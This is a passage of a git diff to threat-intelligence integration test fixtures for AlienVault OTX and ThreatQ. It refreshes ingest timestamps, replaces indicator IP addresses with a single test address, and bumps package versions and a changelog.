@@ -1173,7 +1173,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549885030Z", + "ingested": "2021-12-09T13:49:09.053654300Z", "original": "{\"indicator\":\"b72e75e9e901a44b655a5cf89cf0eadcaff46037\",\"description\":\"SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56\",\"title\":\"Trojan:Win32/Occamy.B\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":1606260364}", "category": "threat", "type": "indicator", @@ -1197,7 +1197,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549889438Z", + "ingested": "2021-12-09T13:49:09.053657900Z", "original": "{\"indicator\":\"maper.info\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":1634015726}", "category": "threat", "type": "indicator", @@ -1215,12 +1215,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "213.252.244.126" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549893776Z", - "original": "{\"indicator\":\"213.252.244.126\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1635374317}", + "ingested": "2021-12-09T13:49:09.053662800Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1635374317}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1237,12 +1237,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "78.129.139.131" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549897964Z", - "original": "{\"indicator\":\"78.129.139.131\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1756014820}", + "ingested": "2021-12-09T13:49:09.053669Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":1756014820}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1269,7 +1269,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549901881Z", + "ingested": "2021-12-09T13:49:09.053675Z", "original": "{\"indicator\":\"9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543412}", "category": "threat", "type": "indicator", @@ -1297,7 +1297,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549905849Z", + "ingested": "2021-12-09T13:49:09.053681Z", "original": "{\"indicator\":\"be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543416}", "category": "threat", "type": "indicator", @@ -1325,7 +1325,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549909856Z", + "ingested": "2021-12-09T13:49:09.053687Z", "original": "{\"indicator\":\"3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543440}", "category": "threat", "type": "indicator", @@ -1353,7 +1353,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549913834Z", + "ingested": "2021-12-09T13:49:09.053693300Z", "original": "{\"indicator\":\"dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543441}", "category": "threat", "type": "indicator", @@ -1381,7 +1381,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549917751Z", + "ingested": "2021-12-09T13:49:09.053699300Z", "original": "{\"indicator\":\"6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543445}", "category": "threat", "type": "indicator", 
@@ -1409,7 +1409,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549921668Z", + "ingested": "2021-12-09T13:49:09.053705300Z", "original": "{\"indicator\":\"26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543456}", "category": "threat", "type": "indicator", @@ -1437,7 +1437,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549925686Z", + "ingested": "2021-12-09T13:49:09.053711200Z", "original": "{\"indicator\":\"02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d\",\"description\":null,\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2114543458}", "category": "threat", "type": "indicator", @@ -1455,12 +1455,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "103.13.67.4" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549929623Z", - "original": "{\"indicator\":\"103.13.67.4\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754074}", + "ingested": "2021-12-09T13:49:09.053717200Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754074}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1477,12 +1477,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "80.90.87.201" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549933541Z", - "original": "{\"indicator\":\"80.90.87.201\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754077}", + "ingested": "2021-12-09T13:49:09.053723100Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754077}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1499,12 +1499,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "80.80.163.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549937418Z", - "original": "{\"indicator\":\"80.80.163.182\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754078}", + "ingested": "2021-12-09T13:49:09.053729Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754078}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1521,12 +1521,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "91.187.114.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549941656Z", - "original": "{\"indicator\":\"91.187.114.210\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754080}", + "ingested": "2021-12-09T13:49:09.053735Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2114754080}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1543,12 +1543,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "170.238.117.187" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549945513Z", - "original": "{\"indicator\":\"170.238.117.187\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2117062744}", + "ingested": "2021-12-09T13:49:09.053741100Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2117062744}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1573,7 +1573,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549949410Z", + "ingested": "2021-12-09T13:49:09.053747100Z", "original": "{\"indicator\":\"e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"FileHash-SHA256\",\"id\":2117884668}", "category": "threat", "type": "indicator", @@ -1591,12 +1591,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "103.84.238.3" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549953378Z", - "original": "{\"indicator\":\"103.84.238.3\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2119746545}", + "ingested": "2021-12-09T13:49:09.053769400Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2119746545}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1613,12 +1613,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "179.43.158.171" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549957335Z", - "original": "{\"indicator\":\"179.43.158.171\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2129763785}", + "ingested": "2021-12-09T13:49:09.053775700Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2129763785}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -1635,12 +1635,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "198.211.116.199" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549961343Z", - "original": "{\"indicator\":\"198.211.116.199\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2136050161}", + "ingested": "2021-12-09T13:49:09.053781600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2136050161}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1659,12 +1659,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "203.176.135.102" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549965511Z", - "original": "{\"indicator\":\"203.176.135.102\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2136079568}", + "ingested": "2021-12-09T13:49:09.053787500Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2136079568}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1687,7 +1687,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549969338Z", + "ingested": "2021-12-09T13:49:09.053791800Z", "original": "{\"indicator\":\"fotmailz.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2137741373}", "category": "threat", "type": "indicator", @@ -1711,7 +1711,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549973345Z", + "ingested": "2021-12-09T13:49:09.053796400Z", "original": "{\"indicator\":\"pori89g5jqo3v8.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2137741468}", "category": "threat", "type": "indicator", 
@@ -1735,7 +1735,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549977233Z", + "ingested": "2021-12-09T13:49:09.053800900Z", "original": "{\"indicator\":\"sebco.co.ke\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2178708355}", "category": "threat", "type": "indicator", @@ -1755,12 +1755,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "177.74.232.124" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.549980880Z", - "original": "{\"indicator\":\"177.74.232.124\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2180669102}", + "ingested": "2021-12-09T13:49:09.053822500Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2180669102}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1783,7 +1783,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549986069Z", + "ingested": "2021-12-09T13:49:09.053828200Z", "original": "{\"indicator\":\"chishir.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034800}", "category": "threat", "type": "indicator", @@ -1807,7 +1807,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549990117Z", + "ingested": "2021-12-09T13:49:09.053832200Z", "original": "{\"indicator\":\"kostunivo.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034803}", "category": "threat", "type": "indicator", @@ -1831,7 +1831,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.549994144Z", + "ingested": "2021-12-09T13:49:09.053836900Z", "original": "{\"indicator\":\"mangoclone.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034805}", "category": "threat", "type": "indicator", 
@@ -1855,7 +1855,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550016176Z", + "ingested": "2021-12-09T13:49:09.053840800Z", "original": "{\"indicator\":\"onixcellent.com\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"domain\",\"id\":2186034807}", "category": "threat", "type": "indicator", @@ -1883,7 +1883,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550024201Z", + "ingested": "2021-12-09T13:49:09.053845400Z", "original": "{\"indicator\":\"fc0efd612ad528795472e99cae5944b68b8e26dc\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034891}", "category": "threat", "type": "indicator", @@ -1911,7 +1911,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550029341Z", + "ingested": "2021-12-09T13:49:09.053849400Z", "original": "{\"indicator\":\"24d4bbc982a6a561f0426a683b9617de1a96a74a\",\"description\":null,\"title\":\"Sf:ShellCode-DZ\\\\ [Trj]\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034903}", "category": "threat", "type": "indicator", @@ -1939,7 +1939,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550034390Z", + "ingested": "2021-12-09T13:49:09.053854600Z", "original": "{\"indicator\":\"fa98074dc18ad7e2d357b5d168c00a91256d87d1\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034912}", "category": "threat", "type": "indicator", @@ -1967,7 +1967,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550038848Z", + "ingested": "2021-12-09T13:49:09.053858900Z", "original": "{\"indicator\":\"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a\",\"description\":null,\"title\":\"Win64:Malware-gen\",\"content\":\"\",\"type\":\"FileHash-SHA1\",\"id\":2186034924}", "category": "threat", "type": "indicator", 
@@ -1987,12 +1987,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "96.9.77.142" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.550042856Z", - "original": "{\"indicator\":\"96.9.77.142\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036445}", + "ingested": "2021-12-09T13:49:09.053863900Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":\"Trickbot\",\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036445}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2009,12 +2009,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "36.89.106.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.550047244Z", - "original": "{\"indicator\":\"36.89.106.69\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036446}", + "ingested": "2021-12-09T13:49:09.053869700Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2189036446}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2031,12 +2031,12 @@ "threat": { "indicator": { "type": "ipv4-addr", - "ip": "96.9.73.73" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-13T11:49:39.550050751Z", - "original": "{\"indicator\":\"96.9.73.73\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2190596263}", + "ingested": "2021-12-09T13:49:09.053875600Z", + "original": "{\"indicator\":\"89.160.20.156\",\"description\":null,\"title\":null,\"content\":\"\",\"type\":\"IPv4\",\"id\":2190596263}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2064,7 +2064,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550054528Z", + "ingested": "2021-12-09T13:49:09.053881300Z", "original": "{\"indicator\":\"10ec3571596c30b9993b89f12d29d23c\",\"description\":\"MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6\",\"title\":\"xor_0x20_xord_javascript\",\"content\":\"\",\"type\":\"FileHash-MD5\",\"id\":2192837907}", "category": "threat", "type": "indicator", @@ -2092,7 +2092,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550059808Z", + "ingested": "2021-12-09T13:49:09.053887200Z", "original": "{\"id\":73,\"indicator\":\"http://www.playboysplus.com\",\"type\":\"URL\",\"title\":null,\"description\":null,\"content\":\"\"}", "category": "threat", "type": "indicator", @@ -2120,7 +2120,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550063665Z", + "ingested": "2021-12-09T13:49:09.053893300Z", "original": "{\"id\":74,\"indicator\":\"http://join.playboysplus.com/signup/\",\"type\":\"URL\",\"title\":null,\"description\":null,\"content\":\"\"}", "category": "threat", "type": "indicator", @@ -2150,7 +2150,7 @@ } }, "event": { - "ingested": "2021-10-13T11:49:39.550067282Z", + "ingested": "2021-12-09T13:49:09.053899100Z", "original": "{\"id\":970,\"indicator\":\"http://api.vk.com/method/wall.get?count=1\u0026owner_id=-81972386\",\"type\":\"URL\",\"title\":null,\"description\":null,\"content\":\"\"}", "category": "threat", "type": "indicator", diff --git a/packages/ti_otx/manifest.yml b/packages/ti_otx/manifest.yml index 4cbb926c254..e60ee97782e 100644 --- a/packages/ti_otx/manifest.yml +++ b/packages/ti_otx/manifest.yml @@ -1,6 +1,6 @@ name: ti_otx title: AlienVault OTX -version: 1.0.2 +version: 1.0.3 release: ga description: Collect threat intelligence from AlienVault OTX with Elastic Agent. type: integration diff --git a/packages/ti_threatq/changelog.yml b/packages/ti_threatq/changelog.yml index d209c63fd69..21fdde201f4 100644 --- a/packages/ti_threatq/changelog.yml 
+++ b/packages/ti_threatq/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.2" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.0.1" changes: - description: Bumping minimum version diff --git a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log index a99543a40ed..c7990384244 100644 --- a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log +++ b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log 
@@ -1,10 +1,10 @@ -{"adversaries":[],"attributes":[{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1877,"indicator_id":336,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1878,"indicator_id":336,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"MP"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1879,"indicator_id":336,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Saipan"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1880,"indicator_id":336,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1881,"indicator_id":336,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1882,"indicator_id":336,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"1ece659dcec98b1e1141160b55655c96","id":336,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":336,"indicator_id":336,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP 
Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.44.202.220"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1883,"indicator_id":337,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1884,"indicator_id":337,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1885,"indicator_id":337,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1886,"indicator_id":337,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1887,"indicator_id":337,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1888,"indicator_id":337,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"73c98d43519990c841a5d022546fedd4","id":337,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":337,"indicator_id":337,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 
19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.94.155.176"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1889,"indicator_id":338,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1890,"indicator_id":338,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1891,"indicator_id":338,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1892,"indicator_id":338,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1893,"indicator_id":338,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"New York"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1894,"indicator_id":338,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"a9c6773919112627495d87c51fe89b15","id":338,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":338,"indicator_id":338,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious 
threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.42.81.68"} -{"adversaries":[],"attributes":[{"attribute_id":8,"created_at":"2020-09-11 14:35:43","id":184,"indicator_id":34,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"4"},{"attribute_id":6,"created_at":"2020-09-11 14:35:43","id":185,"indicator_id":34,"name":"AlienVault Revision","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"3"},{"attribute_id":3,"created_at":"2020-09-11 14:35:43","id":186,"indicator_id":34,"name":"Description","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"Malicious Host"},{"attribute_id":7,"created_at":"2020-09-11 14:35:43","id":187,"indicator_id":34,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"2"}],"class":"network","created_at":"2020-09-11 14:35:41","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:02","hash":"56f3cb07a9055f52947bb4c4244f762d","id":34,"published_at":"2020-09-11 14:35:41","score":4,"sources":[{"created_at":"2020-09-11 14:35:43","creator_source_id":12,"id":34,"indicator_id":34,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:43","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:35:49"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"37.17.250.101"} -{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1901,"indicator_id":340,"name":"AlienVault Threat 
Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1902,"indicator_id":340,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1903,"indicator_id":340,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1904,"indicator_id":340,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1905,"indicator_id":340,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1906,"indicator_id":340,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"97624a37200db6ba0bcfce8c9c28f527","id":340,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":340,"indicator_id":340,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.94.129.203"} -{"adversaries":[],"attributes":[{"attribute_id":4,"created_at":"2020-09-11 
